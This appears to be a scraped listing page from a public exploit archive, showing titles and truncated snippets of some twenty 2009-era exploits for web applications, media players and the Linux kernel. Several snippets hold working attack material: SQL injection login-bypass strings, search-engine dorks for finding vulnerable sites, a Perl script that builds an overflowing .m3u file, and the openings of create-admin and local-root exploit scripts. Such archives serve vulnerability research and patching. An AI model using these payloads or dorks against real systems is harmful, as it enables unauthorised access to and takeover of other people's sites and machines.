ClanWeb 1.4.2 - Remote Change Password Add Admin

ClanWeb 1.4.2 - Remote Change Password Add Admin =-=-remote change password and add admin xpl-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= script:ClanWeb 1.4.2 ------------------------------------------------- Author: ahmadbady my site :Coming Soon...

Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit

Exploit for linux platform in category local exploits ===================================================================== Linux Kernel 2.6.29 ptraceattach Local Root Race Condition Exploit ===================================================================== / GNU/Linux kernel 2.6.29 ptraceatta...

MRCGIGUY ClickBank Directory 1.0.1 Insecure Cookie Handling Vuln

Exploit for unknown platform in category web applications ================================================================ MRCGIGUY ClickBank Directory 1.0.1 Insecure Cookie Handling Vuln ================================================================...

Mlffat 2.1 - Cookie Authentication Bypass

|| || | || o,7 || . o7 || q||| ow, : / / . MLFFAT 2.1 - insecure Cookie Handling Qabandi | iqaahotmail.fr From Kuwait, Peace. Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, all Muslims Buy: http://mlffat.com/emm/index.php?action=order Dork: "Powered by mlffat"...

MaxCMS 2.0 Create New Admin

?php printr' +---------------------------------------------------------------------------+ maxcms2.0 creat new admin exploit by Securitylab.ir +---------------------------------------------------------------------------+ '; if $argc 3 printr'...

intval()is used improperly cause a security vulnerability analysis-vulnerability warning-the black bar safety net

author: xy780sec.com from:http://www. 80vul. com/pch/ A description of the classification intval function has two characteristics:"until the encounter on the numbers or the positive and negative symbols before starting to do the conversion, and then encounter non-numeric or string at the end\0end...

32bit FTP Banner Buffer Overflow

!/usr/bin/python | || | / \ | | | | | | | | | - | | | / / | | |||| || // / |\ || Bug : 32bit FTP 09.04.24 Banner Remote Buffer Overflow Exploit Founder : Load 99% Tested on : Xp sp3 ENVB Exploited by : His0k4 Greetings : All friends & muslims HaCkErs DZ,Algerians Elites,snakespc.com Serra7 Merra7...

eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability

Exploit for unknown platform in category web applications =============================================================== eLitius 1.0 banner-details.php id SQL Injection Vulnerability ===============================================================...

bBlog rss.php远程SQL注入漏洞

No description provided by source...

Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting

Mozilla Multiple Products - Server Refresh Header Cross-Site Scripting source: https://www.securityfocus.com/bid/34656/info The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey. Attackers can exploit these issue...

Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit

No description provided by source. !/bin/sh Linux 2.6 bug found by Sebastian Krahmer lame sploit using LD technique by kcope in 2009 tested on debian-etch,ubuntu,gentoo do a 'cat /proc/net/netlink' and set the first arg to this script to the pid of the netlink socket the pid is udevdpid - 1 most ...

I-Rater Pro/Plantinum 4.0 - Authentication Bypass

I-Rater Platinum V4 By : Hakxer Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Stealth , Kof2002 , Datafr34ck3r , HcJ , Virushima I-Rater Platinum V4 Auth bypass Sql injection poc : http://www.i-rater.com/platinumadmin.html in username : admin 'or' 1=1 in password : Photo Rating Script Pro ...

CRE Loaded 6.2 - 'products_id' SQL Injection

+-------------------------------------+ + Homepage: http://www.creloaded.com/ + Product: CRE Loaded v6.2 + File: productinfo.php + Parameter: productid +-------------------------------------+ + SQL Injection: +...

CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)

CoolPlayerp Portable 2.19.1 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...

Online Contact Manager 3.0 - delete.php?id Cross-Site Scripting

Online Contact Manager 3.0 - delete.php?id Cross-Site Scripting source: https://www.securityfocus.com/bid/34626/info Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues...

Linksys WRT54GC Password Changer

document.senha.submit;...

Hot Project 7.0 - Authentication Bypass

Hot Project 7.0 - Authentication Bypass -------------------------AllaH AkbaR------------------------------- Hot Project - Version 7 Auth Bypass Remote Sql Injecion --------------------------------------------------------------------------- Discovered By: HCOCAMAN ALGERIAN HaCkEr Mail:...

eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password

Powered by eLitius Version 1.0 Change Password Change Password Of admin Username: Password: Email: Dork: Powered by eLitius Version 1.0 Greetz To: Dos-Dz TeaM Snakes TeaM His0k4 Cod3d B...

Shadow Stream Recorder - .m3u Universal Stack Overflow

Shadow Stream Recorder - .m3u Universal Stack Overflow !/usr/bin/perl Shadow Stream Recorder .m3u file Local Universal Stack Overflow Exploit By AlpHaNiX NullArea.Net alphaathacker.bz Made in Tunisia program : Shadow Stream Recorder download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.ex...

RQms (Rash) 1.2.2 - Multiple SQL Injections

Product : RQMS Version : 1.2.2 Dork : Rash Version: 1.2.1 Site: http://rqms.sourceforge.net Found by: Dimi4 Greetz: UASC http://uasc.org.ua, antichat Multiple Remote Vulnerabilities Need: magicquotesgpc = OFF 1Auth BYPASS http://127.0.0.1/rash-v1.2.2/?admin Login: ' OR 1=1/ 2 Sql-injection...